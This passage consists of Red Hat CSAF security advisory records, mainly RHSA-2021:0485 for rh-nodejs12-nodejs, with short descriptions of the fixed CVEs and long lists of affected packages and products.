"7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3280" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-tar: Insufficient absolute path sanitization allowing arbitrary file creation and overwrite" } ] }
rhsa-2021_0485
Vulnerability from csaf_redhat
Published
2021-02-11 13:37
Modified
2024-11-15 09:39
Summary
Red Hat Security Advisory: rh-nodejs12-nodejs security update
Notes
Topic
An update for rh-nodejs12-nodejs is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
The following packages have been upgraded to a later upstream version: rh-nodejs12-nodejs (12.20.1), rh-nodejs12-nodejs-nodemon (2.0.3).
Security Fix(es):
* nodejs-mixin-deep: prototype pollution in function mixin-deep (CVE-2019-10746)
* nodejs-set-value: prototype pollution in function set-value (CVE-2019-10747)
* nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS (CVE-2020-7754)
* nodejs-ini: prototype pollution via malicious INI file (CVE-2020-7788)
* nodejs: use-after-free in the TLS implementation (CVE-2020-8265)
* nodejs: HTTP request smuggling via two copies of a header field in an http request (CVE-2020-8287)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for rh-nodejs12-nodejs is now available for Red Hat Software Collections.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.\n\nThe following packages have been upgraded to a later upstream version: rh-nodejs12-nodejs (12.20.1), rh-nodejs12-nodejs-nodemon (2.0.3).\n\nSecurity Fix(es):\n\n* nodejs-mixin-deep: prototype pollution in function mixin-deep (CVE-2019-10746)\n\n* nodejs-set-value: prototype pollution in function set-value (CVE-2019-10747)\n\n* nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS (CVE-2020-7754)\n\n* nodejs-ini: prototype pollution via malicious INI file (CVE-2020-7788)\n\n* nodejs: use-after-free in the TLS implementation (CVE-2020-8265)\n\n* nodejs: HTTP request smuggling via two copies of a header field in an http request (CVE-2020-8287)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:0485", "url": "https://access.redhat.com/errata/RHSA-2021:0485" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "1795475", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1795475" }, { "category": "external", "summary": "1795479", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1795479" }, { "category": "external", "summary": "1892430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1892430" }, { "category": "external", "summary": "1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "1912854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912854" }, { "category": "external", "summary": "1912863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912863" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_0485.json" } ], "title": "Red Hat Security Advisory: rh-nodejs12-nodejs security update", "tracking": { "current_release_date": "2024-11-15T09:39:24+00:00", "generator": { "date": "2024-11-15T09:39:24+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2021:0485", "initial_release_date": "2021-02-11T13:37:42+00:00", "revision_history": [ { "date": "2021-02-11T13:37:42+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-02-11T13:37:42+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-15T09:39:24+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } }, { "category": "product_name", "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product": { "name": "Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhel_software_collections:3::el7" } } } ], "category": "product_family", "name": "Red Hat Software Collections" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "product": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "product_id": "rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs@12.20.1-1.el7?arch=src" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "product": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "product_id": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-nodemon@2.0.3-1.el7?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "product": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "product_id": "rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs@12.20.1-1.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "product": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "product_id": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-devel@12.20.1-1.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "product": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "product_id": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-npm@6.14.10-12.20.1.1.el7?arch=x86_64" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "product": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "product_id": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-debuginfo@12.20.1-1.el7?arch=x86_64" } } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "product": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "product_id": "rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs@12.20.1-1.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "product": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "product_id": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-devel@12.20.1-1.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "product": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "product_id": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-npm@6.14.10-12.20.1.1.el7?arch=s390x" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "product": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "product_id": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-debuginfo@12.20.1-1.el7?arch=s390x" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "product": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "product_id": "rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs@12.20.1-1.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "product": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "product_id": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-devel@12.20.1-1.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "product": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "product_id": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-npm@6.14.10-12.20.1.1.el7?arch=ppc64le" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "product": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "product_id": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-debuginfo@12.20.1-1.el7?arch=ppc64le" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "product": { "name": "rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "product_id": "rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-docs@12.20.1-1.el7?arch=noarch" } } }, { "category": "product_version", "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "product": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "product_id": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/rh-nodejs12-nodejs-nodemon@2.0.3-1.el7?arch=noarch" } } } ], "category": "architecture", "name": "noarch" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src" }, "product_reference": "rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le" }, "product_reference": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x" }, "product_reference": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6)", "product_id": "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" }, "product_reference": "rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.6.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64" }, "product_reference": "rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le" }, "product_reference": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise 